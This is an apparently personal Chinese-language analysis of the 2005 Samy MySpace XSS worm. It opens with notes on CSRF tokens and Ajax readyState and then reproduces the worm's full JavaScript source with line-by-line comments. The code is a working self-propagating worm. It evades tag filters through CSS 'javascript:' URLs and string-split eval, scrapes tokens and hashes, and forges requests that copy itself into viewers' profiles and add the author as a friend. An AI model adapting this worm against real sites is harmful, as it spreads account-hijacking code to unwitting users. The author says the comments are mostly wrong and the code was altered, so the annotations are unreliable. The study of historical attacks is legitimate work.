Token的作用
1.防止表单重复提交
2.用来作身份验证
两者在原理上都是通过session token来实现的。当客户端请求页面时,服务器会生成一个随机数Token,并且将Token放置到session当中,然后将Token发给客户端(一般通过构造hidden表单)。下次客户端提交请求时,Token会随着表单一起提交到服务器端。
然后,如果应用于“anti csrf攻击”,则服务器端会对Token值进行验证,判断是否和session中的Token值相等,若相等,则可以证明请求有效,不是伪造的。不过,如果应用于“防止表单重复提交”,服务器端第一次验证相同过后,会将session中的Token值更新下,若用户重复提交,第二次的验证判断将失败,因为用户提交的表单中的Token没变,但服务器端session中Token已经改变了。
上面的session应用相对安全,但也叫繁琐,同时当多页面多请求时,必须采用多Token同时生成的方法,这样占用更多资源,执行效率会降低。因此,也可用cookie存储验证信息的方法来代替session Token。比如,应对“重复提交”时,当第一次提交后便把已经提交的信息写到cookie中,当第二次提交时,由于cookie已经有提交记录,因此第二次提交会失败。
不过,cookie存储有个致命弱点,如果cookie被劫持(xss攻击很容易得到用户cookie),那么又一次gameover。黑客将直接实现csrf攻击。
所以,安全和高效相对的。具体问题具体对待吧。
readyState&onreadystatechange
readyState属性表示Ajax请求的当前状态。它的值用数字代表。
- 0 代表未初始化,还没有调用open 方法
- 1 代表正在加载,open方法已经被调用,但 send方法还没有被调用
- 2 代表加载完毕。send方法已被调用,请求已经开始
- 3 代表交互中。服务器正在发送响应
4 代表完成。响应发送完毕
每次readyState值的改变,都会触发readystatechange事件。如果把onreadystatechange事件处理函数赋给一个函数,那么每次 readyState的值的改变都会引发该函数的执行。
readyState值的变化会因浏览器的不同而有所差异。但是,当请求结束的时候,每个浏览器都会把readyState的值统一设为4.
源码分析
1.因此在源码中,每次只要提交了数据,都会重新在页面中重新获取token。
2.首先Myspace阻塞了大量的tags,实际上他们仅允许<a>,<img>,<div>这些,或者还有少数其他标签如<embed>。<script>,<body>,onSomething,href等Javascript元素全都被禁用了。然而,有些浏览器如IE允许在CSS标签中插入javascript: 而通过eval函数计算某个字符串,并执行其中的js代码。
3.因此samy创造性的在<div 插入了js代码,但是如何让js代码执行是个问题,于是他又想到了eval函数,把代码都写在expr里,然后通过eval函数执行 document.all.mycode.expr
构造出了这样的恶意代码,这样expr中的代码就会被执行
<div id = mycode style="BACKGROUND:url('javascript:eval(document.all.mycode.expr)')" expr="代码"></div>
4.首先用户查看了samy的profile页面,profile页面里存有恶意代码,因而执行了div中的代码
5.samy察觉到,加好友只能在www.myspace下进行,因而首先让localtion定位到 myspace下,而查看者任然查看的是profile.myspace。
6.先构造好完整的恶意代码存在AF中,在第二次循环时使用。
7.第二次循环回来,执行main()函数,通过getClientFID()函数获取正在查看samy的用户的ID还不是samy自己的ID
8.通过gethome()来查看别人的profileherose(简介?),值得注意的是samy的做法是先构造了一个get的请求,来达到该页面,然后等到readystate变为4之后,在调用gethome函数然后构造post请求,在简介中加上恶意代码,但是在修改简介时,会提示是否修改,需要一个hash值。因而samy又构造post请求去到preview页面,里面有一个hash值,然后又等待readystate变为4以后,调用postHero,带上hash值一起修改查看着的简介~
9.如法炮制,下一步是让查看方把samy加为好友即可,怎么加呢。先发送get请求到达addfriend_verify页面,里面有一个hash值,等到readystate为4的时候,再带上hash值一起发送post加好友请求!至此,完成了在查看者简介上插入恶意代码,并且让查看者把samy加到hero组里!!
10.个人觉得代码需要被执行两次才能正常使用,由于这段代码都是从网上找来的,如果按照正常逻辑我觉得这段代码似乎有缺失部分,因为流程总觉得有问题,但是由于myspace早已修复了漏洞,而且代码是05年的了,并不能保证正确,因而自己加上了循环,才使得整个流程稍微觉得合理些了,由于本人js也是半路出家,大多是按照c++的思路,故分析只能算是个大致的流程吧。samy这段代码的精髓,在与如何绕过网站对XSS漏洞的限制,通过对特定字符的拆解,以及编码,还有突破性的在div中插入代码.
p.s代码里的注释大部分是分析的时候胡乱写下,很多都是错误的
以上是本人对xss worm的一点点分析,不足之处希望大力指出,不胜感激。
<div id = mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.e。xpr)')" //document.all页面所有元素的一个集合
expr=" //与最最后双引号呼应
var B=String.fromCharCode(34); //双引号
/*由于当时的myspace.com Myspace阻塞了大量的tags,实际上他们仅允许<a>,<img>,<div>这些,
或者还有少数其他标签如<embed>。<script>,<body>,
onSomething,href等Javascript元素全都被禁用了。
然而,有些浏览器如IE允许在CSS标签中插入javascript:
eval函数计算某个字符串,并执行其中的js代码*/
var A=String.fromCharCode(39); //单引号
function g() //用于获得页面的源码
{
var C;
try
{
var D=document.body.createTextRange();//把body标签下的所有内容创建Range对象,这样就可以像操作对象一样操作文本
C=D.htmlText //转成htmlText
}
catch(e){}
if(C)
{
return C
}
else
{
return eval('document.body.inne'+'rHTML') //innerHTML被禁用,通过eval函数拼凑,返回body里的代码
}
}
function getData(AU) //通过当前页面的源码获取 friendID ,Mytoken
{
M=getFromURL(AU,'friendID');
L=getFromURL(AU,'Mytoken')
}
function getQueryParams() //把该页面GET的参数列表和对应的值存在数组中
{
var E=document.location.search; //获取当前页面GET的参数列表
var F=E.substring(1,E.length).split('&'); //substring获得指定下标之间的字符,split以指定字符分割成字符串数组。如anx&asd分割成 e[0]=anx e[1]=asd
var AS=new Array(); //穿件一个新数组
for(var O=0;O<F.length;O++)
{
var I=F[O].split('='); //以等号分割字符串数组,前面存的是参数,后面是value 如 name=love 分割以后I[0]=name I[1]=love
AS[I[0]]=I[1] // 例如AS[name]里面存的就是love,
}
return AS
}
var J;
var AS=getQueryParams(); //AS里面存了GET的参数列表
var L=AS['Mytoken']; // 别人的Mytoken,第一次获取token
var M=AS['friendID']; // 我的 ID
//while(1){
if(location.hostname=='profile.myspace.com') //获取当前页面的主机名,profile 为当时的名片,则获取的Mytoken和friendID就能直接用
{
document.location='http://www.myspace.com'+location.pathname+location.search//网页+文件路径+GET的参数列表,为了加好友
}
else //如果不是在 profile页面,
{
if(!M) //并且未获取到friendID
{
getData(g()) //获得 M=friendID 和 L= Mytoken的值
}
main()
}
function getClientFID()
{
return findIn(g(),'up_launchIC( '+A,A) //获得up_launchIC()里面的内容
}
function nothing() {}
function paramsToString(AV) //AV中存了 hashcode,自己的id, Submit
{
var N=new String();
var O=0;
for(var P in AV)
{
if(O>0) //最终让N变成 hashcode=eqeqweqw&FriendID=2323123&sumbmit=
{
N+='&'
}
var Q=escape(AV[P]); //对AV进行编码
//该方法不会对 ASCII 字母和数字进行编码,也不会对下面这些 ASCII 标点符号进行编码:
// * @ - _ + . / 。其他所有的字符都会被转义序列替换。
//对特殊符号就行编码
while(Q.indexOf('+')!=-1)
{
Q=Q.replace('+','%2B')
}
while(Q.indexOf('&')!=-1)
{
Q=Q.replace('&','%26')
}
N+=P+'='+Q; //如第一次 N= hashcode=编码
O++
}
return N
}
function httpSend(BH,BI,BJ,BK) //BH访问的网页,BI为指向函数getHome的指针,BJ=GET,BK为要发送的东西
{
if(!J) //如果J=0 也就是说尚未初始化
{return false}
eval('J.onr'+'eadystatechange=BI');//在onreadysatechange事件中调用 getHome函数
J.open(BJ,BH,true); //以GET方法创建一个请求
if(BJ=='POST') //如果发送psot请求则还需要设置请求头
{
J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
J.setRequestHeader('Content-Length',BK.length)
}
J.send(BK); //因为是GET的请求所以什么都不发
return true;
}
function findIn(BF,BB,BC) //BF页面源码 ,BB 'up_launchIC( '' ,BC为单引号
{
var R=BF.indexOf(BB)+BB.length;
var S=BF.substring(R,R+1024); //获得 'up_launchIC( '' 后面的值
return S.substring(0,S.indexOf(BC)) //获得 up_launchIC(里单引号的内容
}
function getHiddenParameter(BF,BG)
{
return findIn(BF,'name='+B+BG+B+' value='+B,B)
}
function getFromURL(BF,BG) //BF 页面源码 ,BG Mytoken ,frienID ,如果为Mytoken
{
var T;
if(BG=='Mytoken')
{T=B}
else
{T='&'}
var U=BG+'='; //BG + =
var V=BF.indexOf(U)+U.length; //返回源码中U第一次出现的地方+U的长度,加入friendID出现在10 + U.length为friendID= 为19
var W=BF.substring(V,V+1024); //因为加上了friendID=的长度,这样就可返回 friendID= 后面的字符了
var X=W.indexOf(T);// 若friendID=1231234&131231 则X为7
var Y=W.substring(0,X); //返回0和7之间的字符,因为friendID=1231234
return Y //返回friendID
}
function getXMLObj() //发送xmlhttprequest
{
var Z=false;
if(window.XMLHttpRequest)
{
try
{
Z=new XMLHttpRequest()
}
catch(e)
{Z=false}
}
else if(window.ActiveXObject)
{
try{
Z=new ActiveXObject('Msxml2.XMLHTTP')
}
catch(e)
{
try
{
Z=new ActiveXObject('Microsoft.XMLHTTP')
}
catch(e)
{
Z=false
}
}
}
return Z
}
var AA=g(); //获取 profile当前页面的源码
var AB=AA.indexOf('m'+'ycode');//返回mycode的位置
var AC=AA.substring(AB,AB+4096);//获得mycode的所有内容
var AD=AC.indexOf('D'+'IV');//这里得到的是最后一个/div
var AE=AC.substring(0,AD); //获得mycode到</位置
var AF;
if(AE) //如果AE里面有内容
{
AE=AE.replace('jav'+'a',A+'jav'+'a');//把 java替换为 'java
AE=AE.replace('exp'+'r)','exp'+'r)'+A);//把 expr) 换成 expr)'
//<div id = mycode style="BACKGROUND: url(''javascript:eval(document.all.mycode.expr)'')" expr=" "></div>
AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'//AE中是修改过的恶意代码
}
var AG;
//}
function getHome() //第一次只是用来获取朋友列表第二次是用来蠕虫
{
if(J.readyState!=4) //在onreadychange事件中 readystate==4表示响应就绪 Loaded HTTP 响应已经完全接收。
{return false;}
var AU=J.responseText;//在测试中如果readyState=4则返回整个页面的内容,这里返回viewProfile页面
AG=findIn(AU,'P'+'rofileHeroes','</td>');//获得ProfileHeroes 里面的内容
AG=AG.substring(61,AG.length);//所有英雄名字 ,AG中存有所有英雄的名字
if(AG.indexOf('samy')==-1) //如果英雄列表里没有samy,就把samy的好友全部加上
{
if(AF) //第一次AF没有值
{
AG+=AF; //AG
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes'; //heroes那组
AS['submit']='Preview'; //预览
AS['interest']=AG; //在interest中插入恶意代码
J=getXMLObj();
httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
}
}
}
function postHero()
{
if(J.readyState!=4)
{return}
var AU=J.responseText;
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['interestLabel']='heroes';
AS['submit']='Submit';//确定
AS['interest']=AG;
AS['hash']=getHiddenParameter(AU,'hash');
httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))
//HTTP不会跳转,蠕虫把所有列表中的人自动加为好友
}
function main()
{
var AN=getClientFID(); //真正的freindID
var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L; //通过FriendID 和 Token 查看对方的Profile页面
J=getXMLObj(); //创建getxmlrequest 对象,不刷新浏览器的情况下,从服务器加载数据
httpSend(BH,getHome,'GET'); //这里没有直接调用getHome,英雄列表存在AG中
xmlhttp2=getXMLObj(); //让当前用户添加我为好友
httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
//第一次的任务获取获取一个hashcode,得到一个新的token,第二次递归才是真正的post数据让别人把自己加为好友
}
function processxForm() //获取hashcode和新的token,并且button上也写上数据
{
if(xmlhttp2.readyState!=4)
{return false;}
var AU=xmlhttp2.responseText; //获得整个url响应报文
var AQ=getHiddenParameter(AU,'hashcode'); //在网页源码中得到hashcode,是为了添加好友
var AR=getFromURL(AU,'Mytoken'); //再次获取token,因为创建了新的acitiveXobject
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658'; //自己的friendID
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
//把AS编码开始真正的让对方把自己加为好友
}
function httpSend2(BH,BI,BJ,BK) // BH URL BI 函数 BJ GET 方法
{
if(!xmlhttp2)
{return false;}
eval('xmlhttp2.onr'+'eadystatechange=BI');
xmlhttp2.open(BJ,BH,true);
if(BJ=='POST')
{
xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlhttp2.setRequestHeader('Content-Length',BK.length)
}
xmlhttp2.send(BK);
return true
} "></DIV>